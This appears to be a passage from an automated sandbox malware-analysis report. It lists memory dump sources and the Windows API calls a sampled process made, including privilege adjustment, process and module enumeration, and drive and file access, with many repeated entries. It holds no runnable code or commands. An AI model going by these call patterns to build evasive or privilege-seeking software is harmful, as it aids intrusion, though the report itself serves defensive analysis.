                                                    • Source File: 00000018.00000002.2177085148.0000000002AD0000.00000040.00000040.sdmp, Offset: 02AD0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2177085148.0000000002AD0000.00000040.00000040.sdmp, Offset: 02AD0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166512286.0000000001E82000.00000040.00000001.sdmp, Offset: 01E82000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166512286.0000000001E82000.00000040.00000001.sdmp, Offset: 01E82000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Executed Functions

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0200AD37
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0200AD37
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0200B329
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0200B329
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028D01D0
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 028D072D
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 028D0DD6
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,9B9835CE,00000000,00000000,00000000,00000000), ref: 0200BDBC
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,9B9835CE,00000000,00000000,00000000,00000000), ref: 0200AFBE
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 028D109E
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,9B9835CE,00000000,00000000,00000000,00000000), ref: 0200B0AE
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,9B9835CE,00000000,00000000,00000000,00000000), ref: 028D0819
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 028D0502
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 028D072D
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,9B9835CE,00000000,00000000,00000000,00000000), ref: 028D08E5
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0200A94A
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 028D0DD6
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • EnumWindows.USER32(?,00000E9C,?,?), ref: 0200A23E
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumWindows
                                                    • String ID:
                                                    • API String ID: 1129996299-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,9B9835CE,00000000,00000000,00000000,00000000), ref: 0200BDBC
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 028D0FB0
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,9B9835CE,00000000,00000000,00000000,00000000), ref: 0200B0AE
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0200AB1A
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 028D1148
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,9B9835CE,00000000,00000000,00000000,00000000), ref: 0200AFBE
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,9B9835CE,00000000,00000000,00000000,00000000), ref: 028D08E5
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0200BA7E
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 028D132F
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 028D0640
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 028D099C
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 0200AA71
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0200AB1A
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,9B9835CE,00000000,00000000,00000000,00000000), ref: 028D0819
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 0200ABC9
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0200BA7E
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028D01D0
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 028D109E
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • EnumWindows.USER32(?,00000E9C,?,?), ref: 0200A23E
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumWindows
                                                    • String ID:
                                                    • API String ID: 1129996299-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 028D132F
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 028D0502
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 028D0FB0
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0200A94A
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 028D0640
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 0200ABC9
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 028D1148
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 028D099C
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 0200AA71
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 0200A9C8
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 0200A9C8
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182731902.0000000002950000.00000040.00000040.sdmp, Offset: 02950000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182731902.0000000002950000.00000040.00000040.sdmp, Offset: 02950000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182731902.0000000002950000.00000040.00000040.sdmp, Offset: 02950000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177634827.0000000002002000.00000040.00000001.sdmp, Offset: 02002000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177634827.0000000002002000.00000040.00000001.sdmp, Offset: 02002000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Executed Functions

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 025DAD37
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 025DAD37
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 025DB329
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 025DB329
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028201D0
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0282072D
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02820DD6
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,9A71A1F2,00000000,00000000,00000000,00000000), ref: 025DBDBC
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,9A71A1F2,00000000,00000000,00000000,00000000), ref: 025DAFBE
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0282109E
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2182834909.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,9A71A1F2,00000000,00000000,00000000,00000000), ref: 025DB0AE
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 025DA23E
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.2181861040.00000000025DA000.00000040.00000001.sdmp, Offset: 025DA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
